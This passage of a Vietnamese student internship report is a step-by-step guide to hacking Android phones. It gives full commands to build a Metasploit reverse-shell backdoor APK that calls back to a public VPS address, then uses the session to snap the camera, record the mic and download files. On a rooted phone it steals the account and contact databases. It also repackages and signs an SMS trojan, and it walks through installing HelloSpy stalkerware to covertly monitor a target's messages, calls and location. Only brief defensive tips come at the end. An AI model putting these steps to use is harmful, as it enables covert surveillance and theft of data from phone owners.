kiểm tra được bằng việc sự dụng lệnh check. Đôi khi ta phải thực sự exploit nó mới biết được.

3.3.2.3.Lựa chọn payload

Payload là một đoạn code đc chạy trên máy victim, dùng để thực hiện một số họat động nào đó,

hoặc dùng để kết nối về máy của hacker.

Vậy làm sao để có cái payload này trên máy của victim? Có 2 phương pháp chủ yếu được dùng. Đó

là gửi cho victim thông qua việc phân tính một lỗi, lỗ hổng nào đó trên hệ thống victim, từ đó đột

nhập và đưa đoạn payload này vào máy victim. Kiểu thứ 2 là gửi trực tiếp cho victim, chờ đợi

victim sơ ý nhận nó.

Để hiện thị các payloads tích hợp cho exploit hiện tại chúng ta đang dùng, ta dùng lệnh "show

payloads".

Tương ứng với mỗi OS khác nhau ta dùng một payload khác nhau, và phương pháp cũng khác nhau.

Các giao thức dùng cũng khác nhau... Nhìn chung đối với payload có thể phân ra làm 2 loại cơ bản

đó là bind payload và reverse payload. Khi nào ta dùng loại nào? Đây cũng là một vấn đề quan

trọng. Nếu như máy của chúng ta (đóng vai trò là hacker) đứng sau một tường lửa, thì lúc này ta

nên dùng bind payload. Mở một port trên máy tính và kết nối trực tiếp từ máy hacker đến máy

victim. Còn nếu như victim đứng sau một tường lửa, còn chúng ta thì không. Khi đó chúng ta dùng

reverse payload để connect ngược từ máy victim về máy chúng ta. Như vậy cho thấy khi tấn công

mục tiêu, ta phải tìm hiểu rõ ràng về mục tiêu, tìm kiếm tất cả các thông tin có thể có. Dựa vào đó

mà ta chọn cách thích hợp.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 42

Khi ta quyết định chọn một payload nào đó, dùng lệnh "set PAYLOAD name_payload" để chọn

payload cần dùng.

Giả sử muốn dùng payload windows/meterpreter/reverse_ord_tcp thì ta thao tác là:

set PAYLOAD windows/meterpreter/reverse_ord_tcp

Ta nhận đc là: PAYLOAD => windows/meterpreter/reverse_ord_tcp

Tượng tự để xem rõ thông tin, options về payload ta có thể dùng các lệnh như "show options",

"info name_payload" ,"show advanced",…

Sau khi thực hiện tất cả các thiết lập xong thì ta dùng lệnh "exploit" để xem kết quả.

3.4.Tấn công android dùng Metasploit Framework trong Kali Linux

Trước tiên chúng ta sẽ tạo ra một backdoor bằng cách dùng lệnh:

msfpayload android/meterpreter/reverse_tcp lhost=192.168.159.128 lport=8080 R >

/root/Desktop/app.apk

Hình 30.

Trong đó 192.168.159.128 là địa chỉ ip của máy Kali.Chúng ta có thể xem nó bằng cách dùng lệnh:

ifconfig

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 43

Hình 31.

Và đây là file app.apk mà chúng ta vừa tạo

Hình 32.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 44

Tiếp theo chúng ta mở metasploit bằng cách dùng lệnh:

msfconsole

Hình 33.

Chúng ta cài đặt các thông số cần thiết

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.159.128

set lport 8080

Với lhost và lport giống với khi chúng ta tạo file app.apk

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 45

Hình 34.

Ta mở một cái android ảo và tải về file app.apk, cài đặt và mở lên được giao diện như dưới, nhấp

vào nút Reverse_tcp:

Hình 35.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 46

Vậy là ta đã kết nối thành công tới máy android này, ở msfconsole sẽ như sau:

Hình 36.

Để xem thông tin về máy, nhập lệnh sysinfo

- Sử dụng camera:

Để xem danh sách camera, nhập webcam_list

Hình 37.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 47

Để chụp hình bằng camera, nhập webcam_snap a với a là id của camera xem ở danh sách camera

ở phần trước. Ví dụ như sau:

Hình 38.

- Ghi âm

Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy

Hình 39.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 48

- Lấy file từ sd card

Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục

Hình 40.

Ta tải file app.apk trong thư mục Download của sdcard

Dùng lệnh cd /sdcard/Download để vào thư mục

Hình 41.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 49

Như trên hình, ta thấy 1 file là app.apk, để tải về máy, ta nhập lệnh

download app.apk

Hình 42.

Và file này sẽ được tải về thư mục root của máy Kali

4. Thực hiện xâm nhập android thông qua mạng Internet 4.1.Giới thiệu về VPS

4.1.1. VPS là gì?

Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật lý thành

nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có thể có hàng trăm tài

khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số này chỉ bằng 1/10. Do vậy, VPS

có hiệu năng cao hơn Share Host rất nhiều.

Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản

lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị

hack local.

Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server,

nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác cùng

server, riêng server VPS, một tài khoản trên VPS bị tấn công thì mọi tài khoản khác trên VPS

đều hoạt động bình thường.

VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, nếu chạy

trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử dụng phải có

thêm một số kiến thức về bảo mật, cấu hình server,….

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 50

4.1.2. Đặc điểm về thông số VPS

Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng RAM

riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng.

Tiết kiệm được nhiều chi phí so với việc thuê một server riêng.

Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có

thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS,

dowload/upload bittorrent với tốc độ cao…

Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà không

cần phải khởi động lại hệ thống.

Có thể cài lại hệ điều hành với thời gian từ 5-10 phút.

4.1.3. Giá trị khi sử dụng VPS

Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp.

Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng.

Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng.

Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection.

Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 51

4.2.Cài đặt metasploit

Để cài đặt metasploit trước tiên ta phải vào trang http://metasploit.com để tải bộ cài đặt metasploit

về máy của mình. Ta nhấp vào phần Free Metasploit Download và nó sẽ hiện ra trang bên dưới

Ở đây mình sẽ down bản METASPLOIT COMMUNITY.

Hình 43.

Sau khi nhấp vào link, nó sẽ xuất hiện một trang đăng kí. Mình nhập thông tin đầy đủ và nhấp vào

SUBMIT & DOWNLOAD để nhận một license

Hình 44.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 52

Tiếp theo nó sẽ xuất hiện trang download, ta sẽ chọn bản phù hợp.

Hình 45.

Sau khi tải xong, ta bắt đầu tiến trình cài đặt. Trước tiên ta nhấp vào bản cài đặt và nhấn Next

Hình 46. Hình 47.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 53

Bên dưới ta chọn thư mục để cài đặt và nhấn Next

Hình 48.

Ta phải đảm bảo rằng các phần mềm diệt virut đều được đóng, nếu không nó sẽ ngăn cản việc cài

đặt

Hình 49.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 54

SLL Port, Server Name và Days of validity ta để mặc định

Hình 50. Hình 51.

Ta tiếp tục nhấn Next để bắt đầu cài đặt

Hình 52. Hình 53.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 55

Cài đặt xong ta nhấp Finish để kết thúc việc cài đặt

Hình 54.

Sau khi kết thúc việc cài đặt, ta sẽ vào link http://localhost:3790/ để đăng kí tài khoản. Ta nhấp đầy

đủ theo những yêu cầu bên dưới và nhấn Create Account

Hình 55.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 56

Sau đó trình duyệt sẽ chuyển đến trang nhập key để active chương trình

Hình 56.

Ta vào địa chỉ mail mà ta đã sử dụng khi download bộ cài đăt metasploit, điền key vào và nhấn

ACTIVE LICENSE

Hình 57.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 57

Như vậy là ta đã có một tài khoản metasploit

Hình 58.

4.3.Xâm nhập vào thiết bị android

Trước tiên ta mở Terminal trong Kali Linux lên và gõ lệnh để tạo một backdoor:

msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.184 lport=4444 R>

/root/Desktop/app.apk

Trong đó 14.0.21.184 là địa chỉ máy VPS của ta.

/root/Desktop/app.apk là đường dẫn chứa file vừa tạo.

Hình 59.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 58

Sau khi tạo một backdoor được tạo, ta tải nó lên mạng.

Khi máy android down về cài đặt và truy cập vào thì sẽ hiện lên như bên dưới:

Hình 60.

Ta vào máy VPS và mở Metasploit Console lên

Hình 61.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 59

Sau đó ta sẽ đánh các lệnh như bên dưới để tạo một môi trường và liên kết với máy android mà ta

sẽ tấn công:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 14.0.21.184

set lport 4444

run

Ở đây lhost và lport phải giống với lhost và lport khi tạo backdoor

Hình 62.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 60

Khi máy android nhấp vào biểu tượng có chữ ReverseTCP thì sẽ có thông báo là đã kết nối

Hình 63.

Ta gõ lệnh help để hiện lên các lệnh mà ta có thể sử dụng để hack android

Hình 64.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 61

- Xem thông tin

Ta dùng lệnh sysinfo để xem thông tin máy android

Hình 65.

- Xem camera

Ta dùng lênh webcam_list để xem danh sách các camera

Ta dùng lệnh webcam_snap x để chụp một bức ảnh từ camera của máy android.

Trong đó: x là 1: Back Camera

2: Front Camera

Hình 66.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 62

Để di chuyển đến thư mục nào ta dùng lệnh

cd <đường dẫn đến thư mục>

Lệnh ls để xem trong thư mục có những gì

Hình 67.

Ta vào thư mục /sdcard/Download để down file về

- Download file

Ta dùng lệnh download <tên file> để down file đó về máy VPS của ta

Hình 68.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 63

Muốn xóa một file ta dùng lệnh rm <tên file>

Hình 69.

- Đánh cắp tài khoản, danh bạ

Để đánh cắp tài khoản trước tiên ta phải vào hệ thống của máy android. Lưu ý: máy android này

phải được root trước đó.

Ta dùng lệnh shell để vào hệ thống

Dùng lệnh su để toàn quyền truy cập

Dùng lệnh whoami để biết máy android đã được root chưa. Nếu rồi thì nó sẽ hiện thông báo là

unknown uid 0

Hình 70.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 64

Ta gõ cd /data/system để vào thư mục system

Tiếp theo gõ ls –l để xem trong thư mục có gì

Hình 71.

Ta gõ lệnh cp accounts.db /sdcard để copy file accounts.db về Sdcard

Hình 72.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 65

Sau đó ta trở về meterpreter bằng lệnh exit rồi dùng lệnh

download file accounts.db về máy VPS của chúng ta

Hình 73.

Tiếp tục ta vào địa chỉ

cd /data/data/com.android.providers.contacts/databases

Để copy file contacts2.db về Sdcard bằng lệnh

cp contacts2.db /sdcard

Hình 74.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 66

Sau đó ta download file contacts2.db về máy VPS

Hình 75.

Ta mở file *.db bằng phần mềm SQLite. Ta có thể down phần mềm đó về vài cài vào VPS của

chúng ta

Hình 76.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 67

5. Cài đặt SMS Trojan dùng iCalender 5.1. Cài đặt máy ảo android AVD Manager

5.1.1. Cài đặt JDK:

JDK (Java Development Kit) là bộ công cụ phát triển Java. Nó bao gồm nhiều chương trình tiện

ích như trình biên dịch javac (java compiler), chương trình gỡ lỗi, appletviewer, trình phát sinh tài

liệu javadoc, đóng gói dữ liệu jar v.v... Nếu ai muốn lập trình ứng dụng bằng ngôn ngữ java thì bắt

buộc phải cài JDK.

- Bước 1: Trước tiên để cài đặt JDK, chúng ta vào link bên dưới và tải jdk về

Link:

http://www.oracle.com/technetwork/java/javase/downloads/index.html?ssSourceSiteId=otnjp

Hình 77. Hình 78.

Chú ý: Nếu chúng ta dùng hệ điều hành nào thì ta tải phiên bản dùng cho hệ điều hành đó. Ở đây

em tải bản dùng cho windows x64.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 68

- Bước 2: Cài đặt jdk

Ta nhấp chuột vào file cài đặt đã tải về và cài như các chương trình bình thường.

Hình 79.

5.1.2. Cài đặt android SDK

Android SDK thực chất là tập hợp các công cụ và thư viện để phát triển các ứng dụng trên nền

tảng hệ điều hành Android.

- Bước 1: Trước tiên ta phải tải android SDK về máy theo link bên dưới.

Link:

http://developer.android.com/sdk/index.html

Hình 80. Hình 81.

Chú ý: ta nên tải bản phù hợp với hệ điều hành của mình. Ở đây em tải bản cho windows x

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 69

- Bước 2: Tải các packages trong android SDK manager

Ta giải nén file đã down về, trong đó gồm có: một thư mục eclipse, một thư mục SDK và một

file SDK Manager.

Vào thư mục eclipse và mở file eclipse.exe lên. Trong eclipse, ta vào Window -> Android SDK

Manager để mở bảng Android SDK Manager.

Hình 82.

Ta muốn sử dụng gói công cụ nào thì đánh dấu vào gói công cụ đó rồi nhấn Install.

5.1.3. Cài đặt máy ảo android

Sau khi đã tải và cài đặt các gói cần thiết cho việc cài đặt máy ảo, ta vào Window -> Android

Virtual Device Manager để mở cửa sổ AVD Manager như bên dưới

Hình 83.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 70

Ta nhấp vào Create để bắt đầu tạo một máy ảo mới

Hình 84.

AVD name: tên của máy ảo sẽ được tạo

Device: chọn thiết bị muốn tạo máy ảo

Target: chọn phiên bản android cho máy ảo

Skin: chọn kích cỡ của màn hình

Internal Storage: chọn dung lượng bộ nhớ trong

SD card: dung lượng thẻ SD

Sau khi chọn xong ta nhấn OK. Để mở máy ảo lên ta nhấp vào máy ảo vừa tạo và nhấn Start.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 71

Đây là máy ảo thu được:

Hình 85.

5.2. Cài SMS Trojan vào máy android ảo

5.2.1. Các công cụ cần thiết

- apktool: giải mã các file .apk và .rar, đóng gói apk phục vụ cho việc tùy chỉnh sửa đổi các file

đó. https://code.google.com/p/android-apktool/

- dex2jar: dịch file .apk thành file .jar. https://code.google.com/p/dex2jar/

- id-gui: đọc code java từ file .jar. https://code.google.com/p/innlab/downloads/detail?name=jd-

gui-0.3.3.windows.zip&can=2&q=2

- File iCalendar.apk, một trong 11 ứng dụng bị gỡ bỏ khỏi Android Market do có chứa malware.

- Hai máy ảo android dùng công cụ AVD Manager

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 72

5.2.2. Các bước thực hiện

- Bước 1: Dùng phần mềm WinZip giải nén file classes.dex trong iCalendar.apk vào folder

chứa công cụ dex2jar.

Hình 86.

- Bước 2: Vào command windows, vào trong thư mục dex2jar để thực hiện câu lệnh sau:

dex2jar classes.dex

Câu lệnh này chuyển đổi file classes.dex thành file classes_dex2jar.jar.

Hình 87.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 73

- Bước 3: Dùng công cụ id-gui để mở file classes_dex2jar.jar có được ở bước 2 để xem

source code của ứng dụng iCalendar.

Hình 88.

- Bước 4: Vào command windows, vào trong thư mục chứa apktool (phải chứa sẵn

iCalendar.apk) và nhập 2 lệnh sau:

apktool if iCalendar.apk

apktool d iCalendar.apk

Ta được kết quả:

Hình 89.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 74

Truy cập vào thư mục iCalendar và di chuyển đến thư mục smali\com\mj\iCalendar

Hình 90.

- Bước 5: Mở file iCalendar.smali và file SmsReceiver.smali bằng Notepad và thực hiện

như hình bên dưới sau đó lưu lại.

Hình 91.

Hình 92.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 75

- Bước 6: Vào command windows thực hiện câu lệnh sau để đóng gói ứng dụng iCalendar

đã được chỉnh sửa thành file .apk mới tại thư mục iCalendar\dist

Hình 93.

- Bước 7: Đưa file iCalendar.apk đã tạo ở bước 6 vào thư mục bin nằm trong thư mục Java

Hình 94.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 76

Trên command windows vào thư mục trên và nhập các lệnh sau để verify (Signing ứng

dụng, tạo chữ ký điện tử để thiết bị) gói apk để có thể sử dụng trên thiết bị (phải chọn run

as administrator khi chạy cmd):

keytool -genkey -v -keystore iCalendar-iCalendar.keystore -alias iCalendar -keyalg

RSA -keysize 2048 -validity 10000

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore iCalendar-

iCalendar.keystore iCalendar.apk iCalendar

jarsigner -verify -verbose -certs iCalendar.apk

Kết quả:

Hình 95.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 77

- Bước 8: Copy file iCalendar.apk vào thư mục platform-tools của Android

SDK và dùng lệnh sau để cài ứng dụng vào giả lập

adb -s emulator-5554 install iCalendar.apk

Hình 96.

Hình 97.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 78

Vậy ta đã cài đặt thành công lên máy ảo.

- Bước 9: Kích hoạt Trojan gửi tin nhắn đến máy ảo 5556 (mở ứng dụng

iCalendar rồi click 7 lần).

Kết quả:

Hình 98.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 79

6. Tìm hiểu về HelloSpy để theo dõi thiết bị android 6.1.HelloSpy là gì?

HelloSpy được xem là một trong những công cụ mạnh mẽ nhất trong dòng sản phẩm gián điệp.

Nó cung cấp một loạt các tùy chọn theo dõi điện thoại di động và một số phạm vi nó là phần mềm

ứng dụng phổ biến nhất trong số các đối thủ cạnh tranh của nó.

HelloSpy là gián điệp smartphone mạnh nhất và phần mềm theo dõi cho phép bạn theo dõi tất

cả các hoạt động của bất kỳ iPhone hay điện thoại Android. HelloSpy là siêu dễ dàng để cài đặt trên

điện thoại mà em muốn theo dõi. Nó bắt đầu tải lên thông tin sử dụng điện thoại theo dõi và vị trí

chính xác của nó ngay lập tức có thể được xem bằng cách đăng nhập vào khu vực người dùng

HelloSpy của em từ bất kỳ máy tính (hoặc điện thoại thông minh) trên thế giới trong vòng vài phút.

6.2.Tính năng của HelloSpy

6.2.1. Truy cập từ xa:

HelloSpy sẽ cho em biết về mọi điều mục tiêu làm trên điện thoại của họ. HelloSpy bí mật ghi

lại tất cả các hoạt động điện thoại di động, theo dõi và gửi những chi tiết này vào một tài khoản

web an toàn trực tuyến. Em có thể truy cập tất cả các dữ liệu bị bắt bằng cách này điện thoại di

động Tracker từ xa mà không cần phải có được sự truy cập vật lý đến điện thoại di động của mục

tiêu

6.2.2. Theo dõi các tin nhắn WhatsApp (không có rễ):

HelloSpy cho phép em xem tất cả các cuộc đàm thoại WhatsApp diễn ra thông qua điện thoại

mục tiêu. Với HelloSpy phần mềm theo dõi em có thể: theo dõi tất cả các cuộc trò chuyện

WhatsApp, theo dõi WhatsApp tin nhắn mà không để lại dấu hiệu trên màn hình điện thoại. Có

được thời gian để biết khi nào mỗi cuộc trò chuyện diễn ra. Tìm ra tên và số của những người mà

họ đã trò chuyện.

6.2.3. Theo dõi lịch sử Internet:

Rà soát tất cả các địa chỉ trang web URL truy cập mà mục tiêu sử dụng trình duyệt của điện

thoại. Em có thể tìm hiểu xem mục tiêu đã xem một cái gì đó bị cấm trên các trang web mạng xã

hội.

6.2.4. Spy cuộc gọi ghi âm:

Có rất nhiều trường hợp khi em có thể nhận được hành vi có hại hoặc không mong muốn ở nhà

hoặc nơi làm việc. Theo dõi lịch sử cuộc gọi với HelloSpy, em sẽ nhận được các bằng chứng cần

thiết để có thể đối mặt với mục tiêu.

6.2.5. Theo dõi tất cả bắt hình ảnh:

Ghi lại tất cả hình ảnh chụp bởi máy ảnh điện thoại mục tiêu. Tự động gửi hình ảnh vào tài

khoản trực tuyến của em mà không cần sử dụng iTunes hoặc phần mềm máy tính.

6.2.6. Kiểm soát các ứng dụng và chương trình:

Nếu bạn muốn giới hạn cơ hội để sử dụng không phù hợp của thiết bị di động mục tiêu, em có

thể sử dụng HelloSpy để kiểm soát các ứng dụng và chương trình điện thoại di động có thể truy

cập.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 80

6.2.7. Theo dõi tin nhắn SMS:

Với sự giúp đỡ của các ứng dụng HelloSpy bạn có thể giám sát chặt chẽ văn bản và đa truyền

thông vào và ra. Các tin nhắn chặn được ghi nhận trên bảng điều khiển trực tuyến an toàn của bạn

để xem ngay lập tức và có thể được nhìn thấy ngay cả khi chúng được xóa từ các thiết bị chính nó.

6.2.8. Theo dõi Viber, facebook và yahoo thông điệp:

Với HelloSpy bạn có thể tìm hiểu về bất kỳ tin nhắn Viber, thông điệp facebook và yahoo chat được

thực hiện và nhận được quyền truy cập vào tất cả các Viber, facebook và yahoo cuộc trò chuyện

diễn ra thông qua điện thoại di động giám sát. Với HelloSpy Viber phần mềm gián điệp bạn có thể:

Xem tất cả các cuộc trò chuyện thông điệp cuộc đàm thoại từ xa.

6.2.9. GPS Tracking:

Theo dõi GPS cho phép bạn sử dụng HelloSpy biểu đồ vị trí của điện thoại bạn đang theo dõi và

phần mềm Hack Viber

6.2.10. Lịch sử màn hình cuộc gọi:

Với HelloSpy là một phần mềm gián điệp điện thoại di động cho phép em theo dõi màn hình

điện thoại của mục tiêu trong thời gian thực. Các ứng dụng có thể được thiết lập để thực sự ghi lại

các cuộc gọi đến hoặc đi.

6.3.Cài đặt HelloSpy

Trước tiên ta dùng điện thoại vào trang http://hellospy.com/homepage.aspx?lang=en-US và nhấp

vào How To Install

Ở đây, em không có điện thoại thật nên sử dụng máy ảo android.

Hình 99.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 81

Tiếp theo em nhấp vào Android

Hình 100.

Em tiếp tục nhấp vào Download

Hình 101.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 82

Tiếp theo em bắt đầu cài đặt. Nhấp vào Unknown sources để được phép cài đặt

Hình 102.

Em tiếp tục nhấp vào Install

Hình 103.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 83

Sau khi cài đạt xong, nó sẽ hiện chỗ mình đăng ký tài khoản.

Đăng ký xong, em sẽ gọi số #8888* để có thể vào được lựa chọn các app như bên dưới

Em có thể tùy chỉnh các ứng dụng mà mình muốn dùng.

Xong, em nhấp Accept

Hình 104.

Mỗi lần điện thoại của mục tiêu truy cập Internet thì nó sẽ cập nhập thông tin một lần.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 84

Bây giờ thì chúng ta có thể bắt đầu trải nghiệm HelloSpy.

Hình 105.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 85

7. Tổng kết Sau quá trình tìm hiều về đề ta, em đã biết được phần nào cách thức mà các tin tặc tấn công và xâm

nhập vào thiết bị android để đánh cáp dữ liệu trong đó. Bên cạnh đó em cũng tìm hiểu được các

cách phòng chống, khắc phục để bảo vệ thiết bị android của mình.

Cách duy nhất để ngăn chặn phần mềm độc hại là hạn chế tải về các ứng dụng từ bên ngoài Google

Play, không cắm thiết bị Android vào máy tính (thay vào đó hãy sử dụng các ứng dụng để biến

Android thành ổ đĩa mạng, chẳng hạn như là AirDroid, DroidNAS, vv...), và áp dụng thêm một số

mẹo nhỏ dưới đây:

- Kiểm tra đánh giá ứng dụng: khi bạn tìm thấy một ứng dụng mới và muốn cài đặt, điều đầu

tiên bạn nên làm là tìm đọc những nhận xét từ những người dùng khác. Qua đó, bạn có thể

cảm nhận được phần nào về ứng dụng và đưa ra những quyết định đúng đắn.

- Kiểm tra hồ sơ của nhà phát triển: nếu chưa an tâm với những đánh giá của người dùng, bạn

hãy tiếp tục kiểm tra thêm phần hồ sơ của nhà phát triển ứng dụng để xem nó có đáng tin

cậy hay không.

- Hãy xem rõ các điều lệ khi cấp quyền cho ứng dụng: khi bấm nút Install để thiết bị bắt đầu

tải về và cài đặt, bạn hãy xem rõ toàn bộ các quyền mà ứng dụng yêu cầu, nếu thấy có điều

gì đó quá đáng hoặc không hợp lý, hãy ngưng việc cài đặt ngay lập tức. Chẳng hạn như các

ứng dụng đọc báo, đọc truyện hay xem tivi mà lại có yêu cầu gửi tin nhắn đi từ điện thoại

của bạn là không hợp lý!

Thường xuyên quét toàn bộ thiết bị: để thực hiện việc này, bạn có thể cài đặt một trong các phần

mềm chống virus được giới thiệu bên trên, và hãy quét qua toàn bộ thiết bị mỗi ngày, hoặc ít nhất

mỗi tuần một lần

Nhưng khi máy mình đã lỡ dính những phần mềm độc hại thì ta cũng có biện pháp khác phục nó.

Cách tốt nhất để loại bỏ malware là cài thêm một chương trình chống virus trên thiết bị. Tuy nhiên,

bạn hãy cẩn thận và chỉ cài đặt các ứng dụng có tên tuổi được nhiều người sử dụng, nếu không thì

bạn sẽ lại rước thêm của nợ về máy. Dưới đây là một số phần mềm miễn phí mà bạn có thể tham

khảo:

- Avast! Mobile Security (http://itechnews360.com/avastmobile): chương trình có thể quét

toàn bộ ứng dụng trên thiết bị theo lựa chọn của người dùng, hoặc tự động quét theo lịch

trình được đặt sẵn. Khi duyệt web, nó sẽ phát hiện và ngăn chặn các liên kết nhiễm malware,

giám sát lưu lượng truy cập ra và vào. Bên cạnh đó, nó còn các tính năng tiên tiến khác như

chống trộm, tường lửa thông minh và lọc các tin nhắn SMS hoặc cuộc gọi.

- AVG Antivirus Security (http://itechnews360.com/avgsecurity): ứng dụng này sẽ quét tất

cả các tập tin mới và các ứng dụng mà nó nghi ngờ, sau đó, cung cấp cho bạn các thiết lập

và những lời khuyên để xử lý các lỗ hổng bảo mật. Nó cũng được trang bị thêm một số tính

năng tiên tiến khác như giám sát băng thông và các biện pháp chống trộm.

- 360 Mobile Security (http://itechnews360.com/360security): cung cấp các bảo vệ dựa vào

cơ sở dữ liệu luôn được cập nhật trên đám mây, giúp bạn phát hiện các lỗ hổng bảo mật và

tối ưu hóa các thiết lập tự động. Nhìn chung, đây là chương trình chống virus dễ sử dụng và

có giao diện khá đẹp mắt.

Báo cáo thực tập GVHD: Võ Đỗ Thắng

SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 86

8. Kinh nghiệm đạt được sau đợt thực tập Những kiến thức lý thuyết đã được củng cố:

- Tìm hiểu về đặc điểm, lịch sử cũng như quá trình phát triển của hệ điều hành Android

- Tìm hiểu về hệ điều hành Kali Linux

- Tìm hiểu về các lỗ hổng bảo mật của Windows và Android

- Tìm hiểu về cách sửa đổi file APK và thực hiện Signing ứng dụng

